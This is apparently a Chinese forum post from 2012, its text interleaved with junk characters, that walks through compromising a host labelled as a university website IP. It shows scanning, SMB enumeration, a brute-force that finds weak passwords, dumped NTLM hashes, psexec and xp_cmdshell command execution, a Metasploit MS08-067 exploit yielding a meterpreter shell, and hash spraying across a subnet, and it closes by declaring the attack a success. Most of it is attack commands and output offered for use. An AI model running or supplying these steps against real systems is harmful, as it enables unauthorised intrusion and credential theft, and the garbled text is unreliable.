广西师范网站http://202.103.242.241/% O& Q2 c2 a. ^% t+ Q
) m; E% `, d. ^+ d: q) C: q
root@bt:~# nmap -sS -sV 202.103.242.241
3 X7 U" K0 o) R* W' P2 \" K* k- d! G/ }
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST$ p( ?# s/ m/ u6 p9 e( B
- d& q6 c6 @( M; b% r* {Nmap scan report for bogon (202.103.242.241)
5 l" _8 C4 q0 B& {5 ^; Q) W9 M9 t- e n, M3 L& c- F3 w/ s- u& ~2 w
Host is up (0.00048s latency).$ F& Q$ U9 r( j9 A2 j
. F3 }, U- p; w6 A* r2 H' cNot shown: 993 closed ports
+ L+ c' g4 |0 L( p! q* B; p- R2 w! @& E; n) c
PORT STATE SERVICE VERSION4 B* o5 ]- b2 V, p6 S: i ^
& p$ a- E/ \0 M0 U
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe); u9 \: D+ _( t
7 H5 R1 c7 f# h7 Z
139/tcp open netbios-ssn
4 |! w$ M# ?! k/ Q- h
" q% F6 s5 C8 @. k445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
0 N9 j1 a) l5 g' B. n V' Q
& u" S- S' M) S, Y1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)" R5 R% f! V9 b8 K" A- H2 c9 y4 q- M
. n( ~% i2 S- Q" w. E+ J1026/tcp open msrpc Microsoft Windows RPC
! {6 ~) E5 T8 X s0 J
% h/ ^& z; @$ C" z" D5 U8 }3372/tcp open msdtc?
$ Z7 Q5 E7 r, Z: w+ I: d( ? y9 y8 \; g
3389/tcp open ms-term-serv?; S8 J% W1 |% p! Q, e
% u: s% d: A6 s+ r/ E
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
5 a0 M+ M& _* O5 y5 TSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
! [( z7 Y% i, }$ s
% P( i7 y( y) V: kSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
& \, s ?# L9 P5 |, W( p. ~
2 f3 x9 H/ h! Z% ?. J7 vSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
7 R0 n0 }; f, q( g" {. W& A* @& L$ i* s. X" r' s
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO, c- X& k5 ?9 F3 T
' T; Z8 `5 a" u# z8 j, h& o' fSF:ptions,6,”hO\n\x000Z”);1 Z% O! \8 T" B, `" O) p: }3 t
, L; l7 y4 P/ N# X1 Q% H6 ^ a) f
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
6 ]7 \, Z: m" Y6 g3 m. B1 r2 f7 i6 \+ i( g% C! w
Service Info: OS: Windows7 q6 o9 s7 t+ ~: y7 B5 R, [
9 d5 D: R8 _ e7 X! X' V4 KService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
7 Y! M A- C5 m9 v4 B5 W& x" {0 P' F5 e5 h$ M
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
5 f( q7 h. D3 n; L3 d; Y2 x5 V- i( H1 v2 X1 t1 R/ W/ u
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本 e6 k. J, p8 b. a# [! a c+ W
6 F. s. p+ A8 U8 Y, _-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
- _# s' {' t$ f5 k8 Z" ?
! X) P4 g8 Q7 Z% a: X6 p-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse5 D$ i' U! S. x
9 ]# Q: s) }) a) d4 z6 u' J: v8 r
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse5 W# K" ?$ h/ Q' l5 w
) a3 C8 n0 ?$ W7 I; [' g1 ~- P4 B
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
( m( C: b) e w- A2 v6 d4 ? p- T4 u
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
* r) D* A' a9 o2 M* x6 Q% F( Y3 M! @* T+ {, {- k9 ~
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse, H( ^3 ?) ^+ {) F! i
- a# j+ v) X$ A9 `
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
, o1 s n9 J4 S6 R! ]
; y2 ]! n q+ [! i/ f! j9 O9 \-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse3 Q' R- b" k9 ]' U0 C+ D
; W4 D- ^) ^$ ?% J& s-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
; U$ w$ [- r4 O, H
; ] S5 e8 z8 X1 d' E9 g-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
! [0 ]+ x% j% v4 E* R% ^& X* E/ Q7 P4 X( E: S/ L
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
; n" y2 |' v4 S4 Y
1 S0 W% F' c, C# }% s; U2 j) j0 X-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse. Z) J$ r. h5 j
8 K& P; k0 u& ]4 }-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse3 j4 }, Z4 V- K. X2 j
7 P l* |" N% i4 S) C
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
; L" g: c4 N9 ^5 a6 @* w4 F
6 A" m; F, _$ P, W-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
1 `2 ~9 {2 `3 `9 x6 G& c) u
' O2 i x' b3 z3 D& c9 J( t" aroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
$ v: r+ W" [1 Y8 C$ H
, G" D' X9 d- c l2 [//此乃使用脚本扫描远程机器所存在的账户名8 A: W% J! {9 _& m& j
& h+ \% g+ W7 Q: o+ k0 j# }Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST& q2 b& ?1 \+ G0 a; L
3 K# ^" M4 W4 K% q. F+ B% E4 Q8 ~ `
Nmap scan report for bogon (202.103.242.241)
5 \! b! c- i# a) ]3 Z4 B1 T, R0 R* D# U: p& {' m
Host is up (0.00038s latency).0 }4 L! {8 U% `4 N, ~# E9 M- f7 P
( r R! [' x9 m, S- ~% n8 e
Not shown: 993 closed ports. [! P: e! {1 d( ^9 L
$ W3 y* A* A$ [( A1 K; h; J
PORT STATE SERVICE
+ r( o4 x! r6 W% \% B/ E: u1 G8 Z+ H! D3 q0 ^% x, O7 z
135/tcp open msrpc' H8 q( N( m) w8 |
B% j: h( @; ^3 w/ Q X! Z139/tcp open netbios-ssn& D; `; a# \4 z2 A8 z5 v0 @; X- }
. z7 H* E/ v9 e( G5 g: }: o445/tcp open microsoft-ds
: r4 L+ {& l, b7 T) y8 {2 p" J% y2 |! k( M* T4 }+ n g1 u
1025/tcp open NFS-or-IIS
2 m! s4 \; `1 L7 {( S8 L1 c5 f- [- b
1026/tcp open LSA-or-nterm4 D1 Q! z1 a4 |2 V8 g
6 {3 X; R3 Y" V7 _
3372/tcp open msdtc
9 `/ _9 P$ Y1 S z% h
+ R$ B2 C, W8 C8 f5 ^, X3389/tcp open ms-term-serv; l7 _ O$ r$ ?# v8 |8 v9 P
w" {+ d- y* U# J. oMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)7 |7 l9 d, j0 w' i q
' Y/ X# D, P! z5 fHost script results:
2 p; N6 a6 {# N/ o, x+ w. g1 p0 x! @7 {, {1 m
| smb-enum-users:
& `. Q9 d5 P+ }! q d" P" I5 j0 t
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果3 Z0 t: a: i& j _
* u! R5 E/ n( j' w
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds1 b% d+ m( T; V( ]
4 ^3 H! a# ~# w+ q. ~root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 8 q( a) J/ V( |+ |) [ ^- j; @
9 Z p E g- u3 y3 M0 J: d- S7 P
//查看共享
) V- G- d! O; h" I# e2 T5 w$ q4 c
+ L _- a0 W/ s; Z; ^! oStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
# C% g C$ I" @, @% l$ ~% x" Z1 E, w/ P$ X- y
Nmap scan report for bogon (202.103.242.241)
$ [4 H; g9 f7 t/ f5 r/ S W A, P
Host is up (0.00035s latency).
- i0 q# @3 B3 f6 q7 I3 t1 [. V, {" M$ f8 i
Not shown: 993 closed ports
5 n3 B7 u) B" T4 V
4 Q+ I9 e7 {& u6 f; @PORT STATE SERVICE4 Q9 t2 q) T. @. ]& E& R: r
( D+ S, o. B$ c" V135/tcp open msrpc8 O5 D% Y& _5 {* S- P" q
8 I0 U ~% I' c7 |( L7 D6 ~0 d
139/tcp open netbios-ssn4 n! E0 g0 U& s5 S& `! t7 v! \
5 m7 n L( D% @! u! l
445/tcp open microsoft-ds
0 X0 ?9 l% H) ~! p3 {$ M% i
/ j' V: V* g8 a% \1025/tcp open NFS-or-IIS* R. s, P- [4 A
7 z/ w, R# \# y
1026/tcp open LSA-or-nterm
: Z5 _- M' Z7 x( K' _1 l2 @* b8 w1 ?8 h. X: Z9 f
3372/tcp open msdtc
% v* ^& u) i' A# R7 O" |8 @" L3 y M, i0 c, I7 W6 E0 r5 k, p
3389/tcp open ms-term-serv
0 \. F& n- Y+ }. {, R6 j6 x8 k3 M7 x6 q0 w2 A* L( o
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)5 b8 ^, r$ J5 h, j
9 \, d4 X9 U% V3 y! ^
Host script results:
) V) l8 f' t$ U/ T# b* `$ l5 Q! y: p% Y! }2 \
| smb-enum-shares:8 k( H5 X) ~0 R. c' L+ W
/ q$ t& W9 g/ P5 r7 L. t Y
| ADMIN$3 e5 k9 @1 l; j b* z
/ k8 ~7 q4 t6 n, t9 O& N
| Anonymous access: <none>
+ L& J$ _3 b, D& Y
6 z D) h) Q( \% R) G* Z0 X| C$
# k" a3 ?' b7 ?4 M! {, F7 B! |, H' e; T6 J9 q
| Anonymous access: <none>
# H/ K7 d" O+ M: f9 H0 V& C& Y. b3 w4 L# l; d
| IPC$' l, ?) \% y+ H; B1 t2 q; p
+ D) N3 H3 A1 c: y% b# w8 ~|_ Anonymous access: READ
- ?8 `" O8 X( w9 \% _9 I/ W( q9 X; ^( |6 w
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds8 Q2 w' A# Y5 |
" l' P, ]) Z/ y1 b& H/ C) @% ]root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
( Q1 x. i! @! S2 c* @6 t, I, R8 H
4 x& Q |6 o2 Q+ K1 {' L//获取用户密码
5 ]3 z8 ?2 `) C0 ]9 b# Z) L
% F% ^5 n. c+ V2 O/ e" AStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
$ U: w5 U; \7 k' t
) v$ S) ? c! s2 m0 b. V+ YNmap scan report for bogon (202.103.242.2418)
- U7 i3 c, Z8 ~+ q) |" X
6 U& I* Q5 `* o8 B+ _, \: zHost is up (0.00041s latency)., L$ j4 c1 ~: _
! V% i1 a& e( H4 M B* YNot shown: 993 closed ports
- `% E5 D& N7 z( z
+ l4 N. z3 J1 BPORT STATE SERVICE
/ K4 i" M2 l5 m6 p# p9 K$ q F: P4 F0 V
135/tcp open msrpc
' q6 W) v& N) T: _5 n; ]( Y* X( Y- a6 }/ H2 E7 s0 l1 O
139/tcp open netbios-ssn% E2 @3 j+ ?; o5 t/ l
3 p& Z; A" \7 |. N4 m
445/tcp open microsoft-ds
$ t. }% `. B0 g0 W) y! e# w1 G
% p- ~, L. i$ `5 U1025/tcp open NFS-or-IIS
/ D1 }/ w, g$ `. R; V; p$ q5 Z6 w8 ?: }% w' [
1026/tcp open LSA-or-nterm- M% ?- Y; M9 F; f; ]# o
. n* E c8 M( X$ D, D3 y( y2 L
3372/tcp open msdtc
/ ^4 {( y8 J7 o2 O1 ?- H6 V$ Y( L
3389/tcp open ms-term-serv
6 H+ } \ v- N8 m! }
o8 c- [5 c3 H# @! X! n, ?MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)8 f1 f& J) T* I0 ?8 ~0 ]6 O
) M8 F9 r9 q8 i8 e7 o& ?& i# DHost script results:7 s+ X* H. {6 r. n& I8 K3 F
& I Q1 [8 ^- q$ N/ X7 G
| smb-brute:1 P/ F- L5 L+ K1 y; _- w$ @
0 U* y+ K: {# h$ o& \; w' Ladministrator:<blank> => Login was successful: @- S7 X$ `3 V9 N9 |
6 Q6 E0 Y1 T: ~8 k8 q7 I7 W& e9 ]|_ test:123456 => Login was successful
9 C% x+ j4 L3 h* ]. ^8 M L6 I9 M% ]( U- n: S
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds5 t8 L0 l+ y* e5 c! r
0 K6 I9 ]( ~ a6 }! ?root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
$ z4 `2 L, o8 v; Z+ T5 J0 D! t6 z* h( F0 D% m& Q4 U4 u. R
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data- Y& k* Y' [# Z8 R2 f/ m8 A3 v
2 l. r( W) T# z/ r4 @' l k6 h7 l Jroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse8 Q. ~% O8 \/ }* L( j' P+ P, Y
+ M( ?) `' E2 r8 \: {0 Z4 ~3 j
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139 X8 j( D* N d3 x6 x3 Q2 K1 X
; j+ h( d4 d2 s9 i: y. `Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST! X/ D1 b7 G5 }8 ?# }
+ E1 ^& k1 G4 j& y- [
Nmap scan report for bogon (202.103.242.241)6 f" w! d. D3 i. v- i2 F9 P% r1 R
# n; a G) q; h, B0 z. {Host is up (0.0012s latency).3 I& w! s1 W+ O b& C9 n3 |
* p. L0 H6 h+ Q, ^6 Z- Y, U/ ?
PORT STATE SERVICE, F4 z/ M L R. a. P0 H; |
3 \+ E: v0 D8 U8 O135/tcp open msrpc% V) ?3 Y. m. i8 z
) T- r: `9 Z5 H( X- i' i139/tcp open netbios-ssn
6 S* ^! j( {( W$ g K" `8 U6 \# ]9 Z
445/tcp open microsoft-ds
* E1 T/ y7 c+ F) F- v8 S+ A5 t8 y2 U5 w) e2 L; p/ P/ Q: d/ G
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 U5 M* M- Q+ D) b
- D2 P; P. n' a) R6 Q6 q+ @' b: H" iHost script results:1 R9 `+ w) l* D7 G4 W3 r1 j
, ]5 q( W4 R/ s| smb-pwdump:' N9 D! j2 {# N1 g; D# u1 v1 ?2 T: y
; }) D& y- |. J6 K' [| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
' o# @3 }) |0 ]' o# Y- a5 [1 q# `) [2 l" G& I6 f0 _# f
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
- ?1 l; F- x/ j- a" W
: B9 r1 m; k& R) m) g| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
4 T: C$ g! B) q, d% @) D2 p/ ?
7 x7 ? ~" a) F9 c# ~% N|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
3 e, {3 ]) _" V8 C" W5 ^2 m& E% I% u1 L
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
; k( L# J' E! _1 Q* U* s4 u4 [7 P! {6 v% h3 ~5 q: Y8 Z
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
4 o, K8 ]% R. Z! F! n6 K, c5 i
-p 123456 -e cmd.exe
9 }# V2 Z0 P. A* `# |; y! }( y& |+ {) k7 \. K; ~
PsExec v1.55 – Execute processes remotely+ u9 _5 U h+ f' `$ ?, N5 P# i9 ^& h
' \4 A+ [2 n. H
Copyright (C) 2001-2004 Mark Russinovich! k4 ~% U$ W N' g. e
2 t/ R9 R1 ?. A9 p0 [3 c$ m
Sysinternals – www.sysinternals.com& G! q9 M: L2 k/ ? I) e; ?6 }0 L
6 H& V ?! _0 ^5 d1 tMicrosoft Windows 2000 [Version 5.00.2195]
2 e4 i& k: F- I, ~ I A- X: H" H7 P" b' A8 c! ]3 v/ @$ v. {$ |$ W, z
(C) 版权所有 1985-2000 Microsoft Corp.
. ^6 s+ h S9 |3 X
1 \, U. |/ z7 h% z2 ?3 K8 ^C:\WINNT\system32>ipconfig
; B* k8 V4 @" c* Q5 G3 C( s0 ?! }
Windows 2000 IP Configuration4 D7 s! w& N9 m: D
2 z( {0 i3 d. ^, |' k* b: v
Ethernet adapter 本地连接:
! m* w Z5 ?" Q8 s3 f! M# B
5 c0 c, L+ f4 qConnection-specific DNS Suffix . :2 X) W L6 f/ `$ V8 [
1 k, M- q5 y. Q& e( C& P; s9 yIP Address. . . . . . . . . . . . : 202.103.242.241
! z# D# N! P: g; K. E( n, Q& u# \3 S5 r L8 B
Subnet Mask . . . . . . . . . . . : 255.255.255.03 R! [) B, x( K0 _# w& v0 C
# u: P7 g$ }+ M# J' B! v! t
Default Gateway . . . . . . . . . : 202.103.1.1/ _% n" s3 X7 g0 `7 W# u7 O
: P, A4 J1 w2 A7 t6 i$ xC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
- G! k% c. g% A$ C' Q- \7 ?. \, e, B) w; K. @' u
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
Y9 z# }; I) L( ^# t. Q) a k+ \" b% t( n- X6 d% J
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST. W% R9 _/ ], R# ~! @
& \3 Y4 r4 [( S1 g, }9 JNmap scan report for bogon (202.103.242.241)
, f0 Z9 m6 I0 S1 N9 X9 c
9 i q) ?6 c& {% D9 C* ?9 ]Host is up (0.00046s latency).
9 C$ |- E% B* C ?" t. c1 j* | Y; B7 _; p
Not shown: 993 closed ports
/ q2 R7 w$ S& s! n; L. f
: r& B! |' Z2 |PORT STATE SERVICE
! E1 _1 W1 H. \; X- d
( k P3 `" k; S135/tcp open msrpc J$ D: y0 E. _6 U/ Q. ~4 d
# s: o, T# c' E2 B I+ ?139/tcp open netbios-ssn
: N R0 d% ~0 U3 \! w+ C& f& q
3 B. }( _: m; m) L445/tcp open microsoft-ds+ K' l; ?7 c0 |! L& }
) S/ |2 f2 T6 _* _0 w1025/tcp open NFS-or-IIS4 w3 ]- J4 M( W4 P; [0 J
5 T2 t& e [1 ^# H# J1026/tcp open LSA-or-nterm
& t+ A* R* f ^. s* e6 |# W* @9 m& J/ Y8 l* j8 z: Y
3372/tcp open msdtc
4 {- F0 l7 I( M
2 h) u& H! R) ]& F- w& p- ]3389/tcp open ms-term-serv
3 K: T) z) ^* @, |; W5 B. n: _9 g. t. b8 r4 P; x8 J9 @6 y" C% ?
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)8 I+ @2 ?- ` @3 {3 `/ {
4 j; t8 M, E& Q: Z# I: I
Host script results:
$ e- I. Y# P" e: g' Q& q
. P* O+ b1 v1 P8 S- U) }; T| smb-check-vulns:
; c; _! k# j g! z( i- W
! u0 ]; z9 D7 H+ k4 v) P|_ MS08-067: VULNERABLE8 A b9 m2 J. v/ m
; q; H2 `& K4 I
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds* C% e9 h& l# ~8 h) F1 d4 T8 |
, H8 X: L/ ~4 n$ a' s
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出( O/ \* j( _: ]1 @; q: m$ O
4 h! L' Y+ d2 k# k o& Q; Z7 v9 [$ o
msf > search ms08# M3 p) o. V; s& P
' R ^5 b' a! D+ p9 b
msf > use exploit/windows/smb/ms08_067_netapi
: m6 ~ ?5 B+ i& t# ?* m9 ^* _9 ^2 ?, y
msf exploit(ms08_067_netapi) > show options3 a: F6 r8 s# B5 Z" |
1 r! i) a+ l0 [/ D/ m f% q
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241' ?/ H, i8 y, T" f6 h3 b2 @
# b; Z. W5 c, ]9 B( F) S$ Y
msf exploit(ms08_067_netapi) > show payloads3 A7 }4 |* M" O6 b6 q# p
1 c) g* Y9 F& i$ Z$ Kmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
- m z, _# ]5 ]
/ [1 p7 V! _2 @: U Vmsf exploit(ms08_067_netapi) > exploit) k, v& r! Z; }$ y: c- F( G1 i
3 L( s; W- y' ?& I! l' O3 @
meterpreter >
% S% B- u! `+ B! }3 M
: Y9 [5 F! b4 i6 eBackground session 2? [y/N] (ctrl+z)
+ ^+ C" u/ b5 z7 K; Z1 X5 O+ v7 w \! P% _- ~! V1 d
msf exploit(ms08_067_netapi) > sessions -l1 \4 y/ ~9 L# j
5 R6 n3 d" i1 @. g# vroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt* s: n7 X9 ? t' G \
( A" J# n% F) j0 l! l
test5 i0 G) n( Q# t
9 N) [+ m: {+ L6 j' U1 d* j/ zadministrator6 q5 h8 h) ~* \" g8 _! j4 Y) `
! w& ?3 \; S2 ?- L% `
root@bt:/usr/local/share/nmap/scripts# vim password.txt- n+ k" c8 ]+ ~4 N8 Q. o
4 z) w, h' A d' `
44EFCE164AB921CAAAD3B435B51404EE1 E: p) Q. v" G) ? o( Y, B5 W+ G
. p7 R- M+ H& W' I) s, T3 p1 Uroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
4 G( H5 M* E$ v5 m7 }+ U7 a
5 Y/ n* R; w& v //利用用户名跟获取的hash尝试对整段内网进行登录
; g/ u8 Y; n9 d* \2 }- S9 h( @6 b
# k, e! O! W/ `* uNmap scan report for 192.168.1.1053 h( j* t3 @" u( v1 P
G [0 K- u5 O1 X0 k2 b/ g! f$ N% kHost is up (0.00088s latency).4 }3 }% l3 o8 M( i( x5 g& f
2 w" D3 k8 v( N$ A1 qNot shown: 993 closed ports
1 [, @; X+ `1 N& {/ M
3 x$ e% f% g% h* e7 gPORT STATE SERVICE
: R5 Z5 r0 `: F; s9 P/ t2 {
) _) |2 j' T. |+ i, S, m; J( x! ~135/tcp open msrpc
6 ]4 V, Q0 ], C2 u, d$ Y+ B# N: e# j6 w; n
139/tcp open netbios-ssn
" }" }7 U3 _3 ~( j) L: O* l
# f7 q5 F- `0 O6 m' j- \$ C445/tcp open microsoft-ds
7 `9 Z2 i/ _' [8 d( s4 g# @3 M: |6 a2 F4 @2 P5 @
1025/tcp open NFS-or-IIS
/ Q& @3 x( K/ @! d; J5 w
* d5 K. ^* k5 Q1026/tcp open LSA-or-nterm
6 B" A0 g7 {% i; z1 i) N4 N* p1 | ?; @6 T/ r5 E2 b* J
3372/tcp open msdtc1 l- |# o' x) x) v& ]/ ]5 e/ c' r
% K; Q% H5 V% h5 {9 r3 Q- `* v x3389/tcp open ms-term-serv
( q) A e. J# t) u k+ D" y
6 ~& u8 I! ]) u2 l$ IMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# M9 I6 @6 E, {
# }7 A9 A& H) `/ @- PHost script results:
! f) J& W$ H7 o- V: o! l
; @- t$ B) G5 Y0 G% r4 Q3 {3 d1 K| smb-brute:% Z" F+ d8 ^4 E7 X9 R8 ~8 Q
; ]7 r5 y& w p1 r|_ administrator:<blank> => Login was successful
0 r$ H; a' V" R6 Q5 J% [( w/ ?' O. A
攻击成功,一个简单的msf+nmap攻击~~·6 _5 _2 t! n4 a; z
" Q9 o: t( {: S. |# V1 Z
|
发表于 2012-12-4 12:46:42
收藏
支持
反对